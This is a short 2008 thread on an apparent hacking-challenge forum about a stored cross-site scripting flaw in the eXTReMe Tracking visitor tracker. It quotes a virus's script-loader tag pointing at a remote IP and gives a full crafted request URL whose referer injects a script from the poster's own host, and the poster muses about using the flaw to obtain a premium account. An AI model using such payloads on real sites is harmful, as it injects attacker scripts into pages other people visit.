logo
::[Home]
::[News]
::[Challenges]
::[Ranking]
::[My Account]
::[Forum]
::[Chat]
::[Private Messages]
::[Vulnerable Code]
::[Tutorials]
::[Downloads/Scripts]
::[Support]
::[Links]
::[Contact/FAQ]
::[Login]
0 anonymous
Views: 1089244 Challenges: 342
Users: 12689 Online: 11

Settings
Search
0 new posts

eXTReMe Tracking XSS – 4 Posts

  • eXTReMe Tracking XSS

    01/15/2008 12:59
    quangntenemy's Avatar quangntenemy 7120
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    I use this one to track visitors coming to my blog.<br>Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:<br><pre>&lt;script src=http://121.15.220.104/1.js&gt;&lt;/script&gt;</pre><br>which is the signature for the virus.<br><br>Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:<br><a href="%5C"><img alt="\&quot;link\&quot;" src="%5C">http://www.flickr.com/photos/22823442@N02/2195246062/</a><br>What happened? No, neither my comp nor any other computer arround was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted to the page.<br><br>Now let's see if I can \"forge\" the referer to insert my own script to the page <img alt="\&quot;:)\&quot;" src="%5C">
    Edit
    Reply
    Quote
    0 Likes
  • 01/15/2008 12:59
    alt3rn4tiv3's Avatar alt3rn4tiv3 2940
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    Haha. The ad writes \"好消息\", aka \"good news\" <img alt="\&quot;:D\&quot;" src="%5C"><br><br>P.S. Forum is not asian-languages compatible.<br>
    Edit
    Reply
    Quote
    0 Likes
  • 01/15/2008 12:59
    quangntenemy's Avatar quangntenemy 7120
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    I finally managed to reproduce the XSS in a \"nice\" way <img alt="\&quot;:)\&quot;" src="%5C"><br>First you need to request the page:<br><a href="%5C"><img alt="\&quot;link\&quot;" src="%5C">http://e1.extreme-dm.com/s10.g?login=qpenguin&amp;jv=y&amp;j=y&amp;srw=1024&amp;srb=24&amp;l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search</a><br>Then wait for a few minutes and you'll see the xss here: <a href="%5C"><img alt="\&quot;link\&quot;" src="%5C">http://extremetracking.com/open;ref1?login=qpenguin</a><br>Screenshot:<br><a href="%5C"><img alt="\&quot;link\&quot;" src="%5C">http://www.flickr.com/photos/22823442@N02/2194552167/</a><br><br>Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one <img alt="\&quot;:)\&quot;" src="%5C">
    Edit
    Reply
    Quote
    0 Likes
  • 01/15/2008 12:59
    UnknownUser's Avatar UnknownUser 2,7290
    Not SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot SpecifiedNot Specified
    jup that's pretty bad.
    Edit
    Reply
    Quote
    0 Likes